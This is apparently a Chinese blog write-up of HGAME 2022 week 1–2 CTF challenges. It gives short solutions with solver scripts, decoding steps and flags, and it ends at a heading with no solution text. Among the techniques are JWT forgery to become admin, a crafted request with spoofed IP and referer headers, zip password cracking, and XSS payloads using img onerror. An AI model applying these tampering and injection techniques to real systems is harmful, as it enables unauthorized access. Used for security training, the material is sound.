文章目录
- Level - Week1
-
- WEB
-
- easy_auth
- 蛛蛛…嘿嘿?我的蛛蛛
- Tetris plus
- Fujiwara Tofu Shop
- MISC
-
- 欢迎欢迎!热烈欢迎!
- 这个压缩包有点麻烦
- 好康的流量
- 群青(其实是幽灵东京)
- CRYPTO
-
- Dancing Line
- Matryoshka
- English Novel
- Level - Week2
-
- WEB
-
- Apache!
- webpack-engine
- At0m的留言板
- 一本单词书
- Pokemon
- MISC
-
- Level - Week3
-
- MISC
-
- WEB
-
- SecurityCenter
- Vidar shop demo
- LoginMe
- Level - Week4
-
新人赛,就没有存题目附件了,简单的记录一下解题过程吧
Level - Week1
WEB
easy_auth
![在这里插入图片描述](https://img-blog.csdnimg.cn/437ae023fa6d495d9a4e32d2280e6506.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/5f12dcd0ea384d818901aa3b80f88e84.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
存在admin
用户,随便设置一个任务,然后点击doing
,抓一个GET
的包
![在这里插入图片描述](https://img-blog.csdnimg.cn/567c4309a0de473baf0e024efa08b48c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Token的格式很明显是jwt
:https://jwt.io/
![在这里插入图片描述](https://img-blog.csdnimg.cn/c6bc7518235848fd89661ba93b49c50f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
修改ID
为1
,Username
为admin
发送修改后的jwt
密文得到flag
![在这里插入图片描述](https://img-blog.csdnimg.cn/8fc53ded88fd484596142e74afb6c9dd.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
蛛蛛…嘿嘿我的蛛蛛
![在这里插入图片描述](https://img-blog.csdnimg.cn/67bc12e7be4446a79270a41826e4593b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
import requests
import re
init_url = "https://hgame-spider.vidar.club/8983cb3acd"
link = ""
while True:
res_url = init_url + link
regex = re.compile('href="(.*?)"')
html = requests.get(url=res_url)
l = re.findall(regex, html.text)
print(res_url)
link = [i for i in l if i != '']
if len(link) == 0:
break
else:
link = link[0]
访问最后一个输出的地址,flag在响应头里面
![在这里插入图片描述](https://img-blog.csdnimg.cn/9884f7c17d6748c88644d28975788db7.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Tetris plus
![在这里插入图片描述](https://img-blog.csdnimg.cn/34d07606f4604fb29ffb49a72d553858.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
在cheking.js
中发现注释了jsfuck
![在这里插入图片描述](https://img-blog.csdnimg.cn/c3677e01d4a644bfa4102010fc727b24.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
直接复制到控制台回车即可得到flag
![在这里插入图片描述](https://img-blog.csdnimg.cn/1b467e9b8f144f23b5f17bb423a514f8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Fujiwara Tofu Shop
![在这里插入图片描述](https://img-blog.csdnimg.cn/ae6f102d91584d1495dfc5370dab328c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
GET / HTTP/1.1
Host: shop.summ3r.top
User-Agent: Hachi-Roku
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
referer:qiumingshan.net
Cookie: flavor=Raspberry;
gasoline:100
x-real-ip:127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
![在这里插入图片描述](https://img-blog.csdnimg.cn/5d3022c54a234ad68a9e632dc42a6d48.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
MISC
欢迎欢迎!热烈欢迎!
![在这里插入图片描述](https://img-blog.csdnimg.cn/f3962cd759484403a4364ea7029bd79e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/3a6d91e4877f4553857aaa802fd732fb.png)
hgame{We1com3_t0_HG@ME_2O22}
这个压缩包有点麻烦
![在这里插入图片描述](https://img-blog.csdnimg.cn/b87795fd7fde43e097e21ccf21b38342.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/9a0cda9853064089a79fb616fd59eadf.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/dfe74bb503324a3e9a7b32acb7b1b909.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
README.txt
I don't know if it's a good idea to write down all the passwords.
将password-note.txt
作为字典进行爆破
![在这里插入图片描述](https://img-blog.csdnimg.cn/c112e0422c8547ecad18fea3775f079d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
明文攻击
![在这里插入图片描述](https://img-blog.csdnimg.cn/0245c2dc888244ba8ca64d97b99c52ec.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/e207170361d1413c92af3f6a7eff1e3c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_19,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/e5ccd67299774e698c4b02667ed71dfd.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/0f38fcf47fee4ece88595c696e0f030f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/0a069aed9e7b45cbac3172d331c690ce.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
分离出来的压缩包跟一般伪加密不同的是修改了压缩源文件数据区的全局方式标记位
,使得7z
等压缩包无法无视伪加密直接解压
![在这里插入图片描述](https://img-blog.csdnimg.cn/24a752b820a846b58609f47ab6ff455a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
修改压缩源文件目录区全局方式标记位
为偶数即可
![在这里插入图片描述](https://img-blog.csdnimg.cn/0b61e14206e84f9796aa688a1a2eeb83.png)
hgame{W0w!_y0U_Kn0w_z1p_3ncrYpt!}
好康的流量
![在这里插入图片描述](https://img-blog.csdnimg.cn/725b35af7b3d44b29f0eb30633a97393.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/2f129150bd974968960ca3e3a998344d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
- https://the-x.cn/zh-cn/base64/
![在这里插入图片描述](https://img-blog.csdnimg.cn/24c895c4441c4c38afe5dc8ef76719f7.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/14ab3b28a084442eb60dc89a456ff56b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/67b2bc0d687f47aa9925dfa54b87ab5d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{ez_1mg_
另一半flag用zsteg
查看一下LSB
![在这里插入图片描述](https://img-blog.csdnimg.cn/fc03bef9ad1043d1b4d6dd1cb2b8c235.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{ez_1mg_Steg4n0graphy}
群青(其实是幽灵东京)
![在这里插入图片描述](https://img-blog.csdnimg.cn/fcc76b789a3f48db9a8c77597d904bc0.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
通过频谱图得到密码:Yoasobi
![在这里插入图片描述](https://img-blog.csdnimg.cn/9f8d8002199a4492a23252a63a8d433f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
音频LSB隐写,SlientEye
解码得到一个地址
![在这里插入图片描述](https://img-blog.csdnimg.cn/30633af4b59240c3971361893844abb2.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
- https://potat0-1308188104.cos.ap-shanghai.myqcloud.com/Week1/S_S_T_V.wav
听起来是SSTV,Robot36
直接听
![在这里插入图片描述](https://img-blog.csdnimg.cn/cec340e3a4b44cb5a61d65f7ea80cb04.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{1_c4n_5ee_the_wav}
CRYPTO
Dancing Line
![在这里插入图片描述](https://img-blog.csdnimg.cn/7e384a55ec0c4f4085ec622f1768364e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/d72b5fc722df47c1adb45c826f2a5145.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
向X
轴方向移动一个像素点记为0
,向Y
轴方向移动一个像素点记为1
from PIL import Image
img = Image.open('flag.bmp')
width, height = img.size
bin_data = ''
num_list = []
n = 0
for w in range(width):
for h in range(height):
pix = img.getpixel((w,h))
if pix != (255, 255, 255):
#print("{} {}".format(pix, n))
num_list.append(n)
n += 1
for i in range(len(num_list)-1):
if (num_list[i+1] - num_list[i]) >= height:
bin_data += '0'
else:
bin_data += '1'
print("[+]binary data: {}".format(bin_data))
flag = ''
for i in range(0, len(bin_data), 8):
flag += chr(int(bin_data[i:i+8], 2))
print(flag)
PS C:UsersAdministratorDownloads> python .code.py
[+]binary data: 01101000011001110110000101101101011001010111101101000100011000010110111001100011001100010110111001100111010111110100110000110001011011100110010101011111001100010011010101011111011001100111010101101110001011000101111100110001001101010110111000100111011101000101111100110001011101000011111101111101
hgame{Danc1ng_L1ne_15_fun,_15n't_1t?}
Matryoshka
![在这里插入图片描述](https://img-blog.csdnimg.cn/41d116be7d3341848eec3a47b0be3161.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/13d5fb1484ca42919af91a1e673a6e50.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
类似盲文,但是其实是摩斯码
然后逆序处理
![在这里插入图片描述](https://img-blog.csdnimg.cn/1f355d634ff847adaee4cbd5549f06f9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
-
http://www.zhongguosou.com/zonghe/moErSiCodeConverter.aspx
摩斯转换得到Hex码
![在这里插入图片描述](https://img-blog.csdnimg.cn/d4cd256a70864328ac113f0015595f8f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
466642756645466E6D4C73364433736959744C3658327034694E306364536C796B6D3972514E396F4D53316A6B7339724B3252366B4C38686F72303D
Hex转字符得到:
FfBufEFnmLs6D3siYtL6X2p4iN0cdSlykm9rQN9oMS1jks9rK2R6kL8hor0=
维吉尼亚解密(密钥为:hgame)得到:
YzBibXZnaHl6X3swUmF6X2d4eG0wdGhrem9fMG9iMG1fdm9rY2N6dF8hcn0=
base64解码得到:
c0bmvghyz_{0Raz_gxxm0thkzo_0ob0m_vokcczt_!r}
栅栏密码(每组字数:22)得到:
cbvhz{Rzgx0hz_o0_ocz_r0mgy_0a_xmtko0bmvkct!}
凯撒密码解密(位移21)得到:
hgame{Welc0me_t0_the_w0rld_0f_crypt0graphy!}
English Novel
![在这里插入图片描述](https://img-blog.csdnimg.cn/5b49b5bf91694e8a86f7301bbf0dc5ca.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
根据给出的密文,明文,以及加密算法,推出key,然后利用key解flag.enc
import os
def if_length(ori_content, enc_content, match_result):
if len(ori_content) == len(enc_content):
match_result = True
else:
match_result = False
return match_result
def if_match(ori_name, enc_name):
match_result = True
ori_path = ori_folder + '/' + ori_name
enc_path = enc_folder + '/' + enc_name
with open(ori_path, 'r') as f:
ori_content = f.read()
with open(enc_path, 'r') as f:
enc_content = f.read()
match_result = True
if match_result:
match_result = if_length(ori_content, enc_content, match_result)
if match_result:
for i in range(len(ori_content)):
if ori_content[i] == enc_content[i]:
continue
elif ori_content[i].isupper() and enc_content[i].isupper():
continue
elif ori_content[i].islower() and enc_content[i].islower():
continue
else:
match_result = False
return match_result
def match_process(ori_folder, enc_folder):
all_match = []
original_list = os.listdir(ori_folder)
encrypt_list = os.listdir(enc_folder)
for ori_name in original_list:
for enc_name in encrypt_list:
match_result = if_match(ori_name, enc_name)
if match_result:
ori_path = ori_folder + '/' + ori_name
enc_path = enc_folder + '/' + enc_name
match_group = [ori_path, enc_path]
all_match.append(match_group)
encrypt_list.remove(enc_name)
else:
continue
return all_match
def decrypt(ori_data, enc_data, enc_flag):
keys = []
for i in range(len(enc_data)):
key = ord(enc_data[i]) - ord(ori_data[i])
keys.append(key)
result = ""
enc_data = enc_flag
for i in range(len(enc_data)):
if enc_data[i].isupper():
result += chr((ord(enc_data[i]) - ord('A') - keys[i]) % 26 + ord('A'))
elif enc_data[i].islower():
result += chr((ord(enc_data[i]) - ord('a') - keys[i]) % 26 + ord('a'))
else:
result += enc_data[i]
return result
if __name__ == '__main__':
ori_folder = './original'
enc_folder = './encrypt'
enc_flag = open('./flag.enc', 'r').read()
match_list = match_process(ori_folder, enc_folder)
for match_group in match_list:
with open(match_group[0], 'r') as f:
ori_data = f.read()
with open(match_group[1], 'r') as f:
enc_data = f.read()
flag = decrypt(ori_data, enc_data, enc_flag)
print("{:<30}{:<30}{:<30}".format(match_group[0], match_group[1], flag))
![在这里插入图片描述](https://img-blog.csdnimg.cn/d1e4d45581f04fdc85da843cfffecec5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{D0_y0u_kn0w_'Kn0wn-pla1ntext_attack'?}
Level - Week2
WEB
Apache!
![在这里插入图片描述](https://img-blog.csdnimg.cn/a9d701e7e4574d4daee95e296b8b03ef.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/404e585a28fd4dcab45a9b9d1b0e1be9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/0d50f49918c4423ba3fd0bd64640e5f2.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/0d75aff0161d4ce2a16ce96999c6fb01.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
CVE-2021-40438
![在这里插入图片描述](https://img-blog.csdnimg.cn/767e8217221f4eb18c6fbddccd08a59e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/a125f7f94a504de38fcd89370779b7a5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
webpack-engine
![在这里插入图片描述](https://img-blog.csdnimg.cn/d08dc61535cb47e28128a22a037f92d5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_14,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/d30799dd073d46f8b175220567089b9f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
- webpack解析之详细过程:https://www.freebuf.com/articles/web/276810.html
这里倒是不用还原map文件,直接访问这个
data:application/json;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIndlYnBhY2s6Ly8uL3NyYy92aWV3cy9GbDRnXzFzX2hlcjMudnVlIl0sIm5hbWVzIjpbXSwibWFwcGluZ3MiOiI7QUF5QkE7RUFDQSxZQUFBO0VBQ0Esa0JBQUE7RUFDQSxhQUFBO0VBQ0Esc0JBQUE7RUFDQSx1QkFBQTtFQUNBLG1CQUFBO0FBQ0E7QUFDQTtFQUNBLFdBQUE7RUFDQSxZQUFBO0VBQ0EsYUFBQTtFQUNBLHNCQUFBO0VBQ0EsdUJBQUE7RUFDQSxtQkFBQTtBQUNBO0FBQ0E7RUFDQSxXQUFBO0VBQ0EsWUFBQTtBQUNBOztBQUVBLFFBQUE7QUFDQTtFQUNBLHNCQUFBO0VBQ0EsdUJBQUE7RUFDQSxxQkFBQTtFQUNBLHNCQUFBO0VBQ0EsY0FBQTtFQUNBLGVBQUE7RUFDQSxxQkFBQTtFQUNBLDhMQUFBO0VBQ0EsaUJBQUE7RUFDQSxnQkFBQTtFQUNBLGNBQUE7RUFDQSxvQkFBQTtFQUNBLGtCQUFBO0VBQ0EsbUNBQUE7RUFDQSwrQkFBQTtFQUNBLDhDQUFBO0VBQ0EsaURBQUE7RUFDQSxpQkFBQTtFQUNBLHlCQUFBO0VBQ0EsMEJBQUE7QUFDQTtBQUVBO0VBQ0EseUJBQUE7RUFDQSxXQUFBO0VBQ0EsK0JBQUE7QUFDQTtBQUVBO0FBQ0E7SUFDQSxtQkFBQTtJQUNBLGtCQUFBO0FBQ0E7QUFDQTtBQUVBO0VBQ0Esa0JBQUE7RUFDQSxZQUFBO0VBQ0EsWUFBQTtFQUNBLFdBQUE7RUFDQSxZQUFBO0FBQ0EiLCJzb3VyY2VzQ29udGVudCI6WyI8dGVtcGxhdGU+XG4gIDxoMT57e2ZpbGlpaWxpbGlsNGd9fTwvaDE+XG48L3RlbXBsYXRlPlxuXG48c2NyaXB0PlxuXG5leHBvcnQgZGVmYXVsdCB7XG4gIGRhdGEoKSB7XG4gICAgcmV0dXJuIHtcbiAgICAgIGZpbGlpaWxpbGlsNGc6ICdZVWRrYUdKWFZqZFNSRUoxWkVZNWJVMUlTVFZhV0ZKbVRXdzVSR0pGT1hwTk1UbFVUVWhXZVZreVZtWmlWVUozWmxFOVBRbz0nXG4gICAgfVxuICB9XG59XG48L3NjcmlwdD5cblxuPHN0eWxlPlxuaHRtbCwgYm9keSB7XG4gIGhlaWdodDogMTAwJTtcbiAgbWFyZ2luOiAwO1xuICBwYWRkaW5nOiAwO1xuICBvdmVyZmxvdzogaGlkZGVuO1xufVxuPC9zdHlsZT5cblxuPHN0eWxlIHNjb3BlZD5cbi5ob21lIHtcbiAgaGVpZ2h0OiAxMDAlO1xuICBwb3NpdGlvbjogcmVsYXRpdmU7XG4gIGRpc3BsYXk6IGZsZXg7XG4gIGZsZXgtZGlyZWN0aW9uOiBjb2x1bW47XG4gIGp1c3RpZnktY29udGVudDogY2VudGVyO1xuICBhbGlnbi1pdGVtczogY2VudGVyO1xufVxuLnBsYXllciB7XG4gIHdpZHRoOiAxMDAlO1xuICBoZWlnaHQ6IDEwMCU7XG4gIGRpc3BsYXk6IGZsZXg7XG4gIGZsZXgtZGlyZWN0aW9uOiBjb2x1bW47XG4gIGp1c3RpZnktY29udGVudDogY2VudGVyO1xuICBhbGlnbi1pdGVtczogY2VudGVyO1xufVxuaWZyYW1lIHtcbiAgd2lkdGg6IDEwMCU7XG4gIGhlaWdodDogMTAwJTtcbn1cblxuLyogQ1NTICovXG4uYnV0dG9uLTgxIHtcbiAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZjtcbiAgYm9yZGVyOiAwIHNvbGlkICNlMmU4ZjA7XG4gIGJvcmRlci1yYWRpdXM6IDEuNXJlbTtcbiAgYm94LXNpemluZzogYm9yZGVyLWJveDtcbiAgY29sb3I6ICMwZDE3MmE7XG4gIGN1cnNvcjogcG9pbnRlcjtcbiAgZGlzcGxheTogaW5saW5lLWJsb2NrO1xuICBmb250LWZhbWlseTogXCJCYXNpZXIgY2lyY2xlXCIsLWFwcGxlLXN5c3RlbSxzeXN0ZW0tdWksXCJTZWdvZSBVSVwiLFJvYm90byxcIkhlbHZldGljYSBOZXVlXCIsQXJpYWwsXCJOb3RvIFNhbnNcIixzYW5zLXNlcmlmLFwiQXBwbGUgQ29sb3IgRW1vamlcIixcIlNlZ29lIFVJIEVtb2ppXCIsXCJTZWdvZSBVSSBTeW1ib2xcIixcIk5vdG8gQ29sb3IgRW1vamlcIjtcbiAgZm9udC1zaXplOiAxLjFyZW07XG4gIGZvbnQtd2VpZ2h0OiA2MDA7XG4gIGxpbmUtaGVpZ2h0OiAxO1xuICBwYWRkaW5nOiAxcmVtIDEuNnJlbTtcbiAgdGV4dC1hbGlnbjogY2VudGVyO1xuICB0ZXh0LWRlY29yYXRpb246IG5vbmUgIzBkMTcyYSBzb2xpZDtcbiAgdGV4dC1kZWNvcmF0aW9uLXRoaWNrbmVzczogYXV0bztcbiAgdHJhbnNpdGlvbjogYWxsIC4xcyBjdWJpYy1iZXppZXIoLjQsIDAsIC4yLCAxKTtcbiAgYm94LXNoYWRvdzogMHB4IDFweCAycHggcmdiYSgxNjYsIDE3NSwgMTk1LCAwLjI1KTtcbiAgdXNlci1zZWxlY3Q6IG5vbmU7XG4gIC13ZWJraXQtdXNlci1zZWxlY3Q6IG5vbmU7XG4gIHRvdWNoLWFjdGlvbjogbWFuaXB1bGF0aW9uO1xufVxuXG4uYnV0dG9uLTgxOmhvdmVyIHtcbiAgYmFja2dyb3VuZC1jb2xvcjogIzFlMjkzYjtcbiAgY29sb3I6ICNmZmY7XG4gIHRyYW5zaXRpb246IGFsbCAuMnMgZWFzZS1pbi1vdXQ7XG59XG5cbkBtZWRpYSAobWluLXdpZHRoOiA3NjhweCkge1xuICAuYnV0dG9uLTgxIHtcbiAgICBmb250LXNpemU6IDEuMTI1cmVtO1xuICAgIHBhZGRpbmc6IDFyZW0gMnJlbTtcbiAgfVxufVxuXG5idXR0b24ge1xuICBwb3NpdGlvbjogYWJzb2x1dGU7XG4gIHdpZHRoOiAzMDBweDtcbiAgaGVpZ2h0OiA2MHB4O1xuICBib3R0b206IDIwJTtcbiAgYm9yZGVyOiBub25lO1xufVxuPC9zdHlsZT5cbiJdLCJzb3VyY2VSb290IjoiIn0=
![在这里插入图片描述](https://img-blog.csdnimg.cn/ed8f962ae2534555ba118c4b11dfb486.png)
>>> from base64 import *
>>> b64decode('YUdkaGJXVjdSREJ1ZEY5bU1ISTVaWFJmTWw5RGJFOXpNMTlUTUhWeVkyVmZiVUJ3ZlE9PQo=')
b'aGdhbWV7RDBudF9mMHI5ZXRfMl9DbE9zM19TMHVyY2VfbUBwfQ==
'
>>> b64decode('aGdhbWV7RDBudF9mMHI5ZXRfMl9DbE9zM19TMHVyY2VfbUBwfQ==')
b'hgame{D0nt_f0r9et_2_ClOs3_S0urce_m@p}'
At0m的留言板
![在这里插入图片描述](https://img-blog.csdnimg.cn/4416788a1b024944af31f5df12662e19.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/de0e5589063d43a2a85d14dee3667815.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
直接获取类名元素为content的
![在这里插入图片描述](https://img-blog.csdnimg.cn/7fafc07cc8b946d7aa3b70785e32d94b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
flag
是通过var
声明的,那么直接列出当前页面的所有的全局变量
![在这里插入图片描述](https://img-blog.csdnimg.cn/6285507105b84f3f9f35c4e02047c245.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/1b47b4783776461f81e510136669c128.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
这样就可以得到flag的值了,接下来就是xss触发,简单测试下发现过滤并不多,直接使用
<img src=x onerror="document.getElementsByClassName('content')[0].innerText=Object.keys(window)">
![在这里插入图片描述](https://img-blog.csdnimg.cn/1f84200bcf6747478f1bef3632eb6835.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/ebdb422bcb964a40abac662b1c660100.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
<img src=x onerror="document.getElementsByClassName('content')[0].innerText=F149_is_Here">
![在这里插入图片描述](https://img-blog.csdnimg.cn/3e5c31a8043a4163b9846c49bce80847.png)
一本单词书
![在这里插入图片描述](https://img-blog.csdnimg.cn/4ea2ced7776e48aea235f221d2daf255.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
